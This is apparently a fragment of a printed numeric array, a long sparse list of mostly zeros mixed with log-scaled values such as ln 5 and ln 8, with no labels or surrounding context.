0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.23410650459726, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, \n 1.9459101490553132, 0, 0.0, 2.550898738446989, 1.6094379124341003, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.550898738446989, 0, 0, 0, 0, 1.6094379124341003, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 15.257339727119625, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.5263605246161616, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 3.295836866004329, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 3.5263605246161616,\n 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 4.356708826689592, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.70805020110221, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.58351893845611, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 2.8398715690385097, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, \n 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 4.624972813284271, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.23410650459726, 0.0, 0.0, 0.0, 0.0, 0, 4.394449154672439, 0.0, 0.0, \n 0.0, 4.290459441148391, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 4.941642422609304, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 4.394449154672439, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0841946160253877, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.9459101490553132, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, \n 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 2.6390573296152584,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0,\n 4.060443010546419, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.8918202981106265, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, \n 0, 0.0, 3.3322045101752034, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 4.795790545596741, 0, 0.0, 0, 0.0, 0, 0, \n 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0, 0.0, 0.0,\n 0.0, 3.93848385770662, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 3.7612001156935624, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 5.723585101952381, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, \n 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.99022883006837, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 4.48863636973214, 0.0, 0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.219507705176107, 0, 0, 0.0, \n 3.7376696182833684, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0, 1.0986122886681098, 4.1588830833596715,\n 0.0, 3.4011973816621555, 0.0, 0, 0, 0, 3.1354942159291497, 0.0, \n 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 4.06534854782536, 0, 0.0, 0.0, \n 3.044522437723423, 3.6888794541139363, 0.0, 2.302585092994046, 0.0, 0.0,\n 0.0, 0.0, 0.0, 6.42339050749462, 5.567740402508132, 0.0, 0.0, 0.0, \n 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.2188758248682006, 3.828641396489095, 0.0,\n 0.0, 0, 4.160336650881089, 0.0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, \n 1.9459101490553132, 0.0, 0, 0.0, 0.0, 4.127134385045092, 0.0, 0, 0, 0, \n 4.394449154672439, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.3322045101752034, 0, 0, 3.367295829986474,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 3.828641396489095, 0.0, 0.0, 0.0, 0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 2.550898738446989, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 3.2188758248682006, 0.0, \n 3.5553480614894135, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.7612001156935624, 0.0, 0,\n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 4.394449154672439, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 